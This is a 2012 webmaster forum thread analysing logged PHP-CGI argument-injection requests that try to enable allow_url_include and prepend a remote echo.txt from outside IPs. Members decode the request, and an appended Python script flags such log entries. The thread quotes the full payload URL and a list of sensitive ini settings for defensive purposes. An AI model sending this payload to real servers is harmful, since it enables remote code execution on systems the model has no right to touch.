
Search Engine Spider and User Agent Identification Forum

    
GET Request
Ken_S




msg:4519779
 7:38 pm on Nov 16, 2012 (gmt 0)

The php got it 403'd

However, I do not have the savvy to understand this request.

<> SPRINT-WIRELESS

68.240.0.0/13 = 68.240.0.0 - 68.247.255.255

68.240.116.xxx - - [16/Nov/2012:06:14:36 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F211.172.112.7%3A8080%2Fecho.txt HTTP/1.1" 403 3251 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

TIA,
Ken

[edited by: incrediBILL at 5:20 am (utc) on Nov 17, 2012]
[edit reason] added line breaks [/edit]

 

keyplyr




msg:4519870
 9:22 am on Nov 17, 2012 (gmt 0)

This is obviously a hack attempt, trying to inject a script. I wonder if you sent a complaint to SPRINT w/ log snippet whether they'd take any action?

iamzippy




msg:4519871
 9:40 am on Nov 17, 2012 (gmt 0)

It's a variant of the Remote File Inclusion exploit, attempting to pull in a bad file named 'echo.txt' from port 8080 on a server in Seoul, Korea (211.172.112.n:8080).
The Korean organization is 'Iosystem' (211.172.112.0/23), who live at the unfortunately-named 'Sukchon-Dong, Songpa-gu'. Go figure.

lucy24




msg:4519875
 10:17 am on Nov 17, 2012 (gmt 0)

It's a little more intelligible if you decode:

-dsafe_mode=Off
+-ddisable_functions=NULL
+-dallow_url_fopen=On
+-dallow_url_include=On
+-dauto_prepend_file=http://{filename as identified by iamzippy, above}

I suppose Dong in Korean means something utterly boring like Smith or Street. (I asked g###, but the translator played dumb because it wasn't in Korean script.)

:: off to see if URL is duly mentioned in htaccess ::

Ken_S




msg:4520067
 12:03 pm on Nov 18, 2012 (gmt 0)

Thanks everyone, I've been lurking around for about 3 years now and I have learned a lot from you folks - your expertise has been a great help.

Ken

Ken_S




msg:4522429
 10:03 pm on Nov 25, 2012 (gmt 0)

Different IP - almost same Request & UA

67.181.147.xxx - - [25/Nov/2012:06:48:27 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F50.22.136.150%3A8080%2Fecho.txt HTTP/1.1" 403 3195 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"
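
Added example, not part of any member's post: a log check that decodes the query string the way lucy24 did above and flags requests carrying `-d` ini overrides, separating the ones that were refused (403, as in both entries here) from any that were served. The function names are hypothetical and the sample log lines are constructed, using documentation-range addresses.

```python
import re
from urllib.parse import unquote, urlsplit

# Client IP, request target and status from an Apache combined-format entry.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# One decoded "-dname=value" switch, as in the decoded listing in the thread.
DIRECTIVE_RE = re.compile(r'^-d([A-Za-z_.]+)=(.*)$')
# ini settings that ordinary traffic has no reason to set from a URL.
SENSITIVE = {"safe_mode", "disable_functions", "allow_url_fopen",
             "allow_url_include", "auto_prepend_file", "auto_append_file"}

def parse_directives(query):
    """Split the raw query on '+' or %20, percent-decode, return {name: value}."""
    found = {}
    for token in re.split(r'\+|%20', query):
        m = DIRECTIVE_RE.match(unquote(token))
        if m:
            found[m.group(1)] = m.group(2)
    return found

def inspect(line):
    """Return a finding for a log line with sensitive -d overrides, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = {k: v for k, v in
            parse_directives(urlsplit(m.group("target")).query).items()
            if k in SENSITIVE}
    if not hits:
        return None
    remote = [v for k, v in hits.items()
              if k.startswith("auto_") and re.match(r'(?i)^(https?|ftp)://', v)]
    status = int(m.group("status"))
    # A status below 400 means the request was not refused: check that host.
    return {"ip": m.group("ip"), "status": status, "directives": hits,
            "remote_includes": remote, "needs_review": status < 400}

# Constructed sample input (documentation addresses, not the hosts in the thread).
Q = ("-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+"
     "-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F203.0.113.7%3A8080%2Fecho.txt")
SAMPLE_LOG = [
    f'192.0.2.10 - - [16/Nov/2012:06:14:36 -0800] "GET /index.php?{Q} HTTP/1.1" 403 3251 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [16/Nov/2012:06:15:02 -0800] "GET /index.php?page=2&d=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'192.0.2.12 - - [25/Nov/2012:06:48:27 -0800] "GET /index.php?{Q} HTTP/1.1" 200 3195 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect(entry))
```
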
